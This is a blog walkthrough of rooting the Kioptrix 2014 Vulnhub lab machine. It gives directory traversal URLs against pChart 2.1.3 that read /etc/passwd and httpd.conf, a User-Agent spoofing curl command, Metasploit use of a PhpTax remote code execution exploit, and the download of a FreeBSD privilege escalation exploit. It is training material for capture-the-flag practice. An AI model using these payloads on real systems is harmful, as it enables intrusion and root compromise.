Kioptrix: 2014 (#5) Vulnhub Wlakthrough

In this blog post we will see how to root the Kioptrix 2014 Machine from Vulnhub.

First lets find the IP and open posts in the machine using nmap:

nmap 192.168.18.0-255

Here we have the IP. 192.168.18.76

The post 80 is open so there will be some web server running, lets have a look.

Yes, there is a page. Anything behind that? Lets have a look in the source code.

Here we have ‘pChart2.1.3’. Now we need to know what is pChart. Lets have a quick Google search.

The website http://www.pchart.net/ says it is a php based charting library. Now lets look for any existing vulnerabilities in pChart 2.1.3.

Exploit-DB says there are directory traversal and XSS vulnerabilities in pChart 2.1.3

https://www.exploit-db.com/exploits/31173

Lets try that. by visiting the following page.

http://192.168.18.78/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

We have got the /etc.passwd file displayed on the browser.

Now lets try to read the httpd.conf file.

http://192.168.18.78/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

It works!

When we scroll down to the end, we will find something interesting.

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>

</VirtualHost>

If our user agent is Mozilla/4.0, we can connect to port 8080.

Lets try that.

curl -H "User-Agent:Mozilla/4.0" http://192.168.18.78:8080

And the resut is,

We have a hyperlink here, to /phptax/ lets try this on a browser.

I’m using a Firefox extension to switch user agents. Get that here:

https://addons.mozilla.org/en-US/firefox/addon/custom-user-agent-revived/

I’ve installed the extension and activated the custom user agent for our machine.

Now let’s load the page in browser.

Going Inside..

This looks like an app for filling tax forms. Ok. so lets look is there is any known vulnerabilities in this.

According to Exploit-DB, there is an RCE vulnerability in PhpTax.

https://www.exploit-db.com/exploits/21665

Lets try to exploit that with Metasploit.

msfconsole
search phptax

Now lets set the options.

Now enter run to run the exploit.

We got the shell now.

Now use the whoami command to know the current user.

Now use command /bin/sh -i to get a fully interactive shell.

Lets now get the OS version the machine is running.

Use the command uname -a for that.

We are on FreeBSD 9.0. Lets look up online for available exploits.

https://www.exploit-db.com/exploits/28718

We have a privilege escalation exploit at Exploit-DB, Lets try that.

Download the exploit to our Kali machine.

wget https://www.exploit-db.com/download/28718 exploit.c -O exploit.c

Time to send the file to target machine. The target does not have wget or curl. So we will use netcat to transfer the file.

Lets start a listener on our kali machine and send the file on target machine’s /tmp directory.

On target machine,

Now we got the exploit file on our target.

Now lets compile it using gcc.

Time to exploit!

We are root now!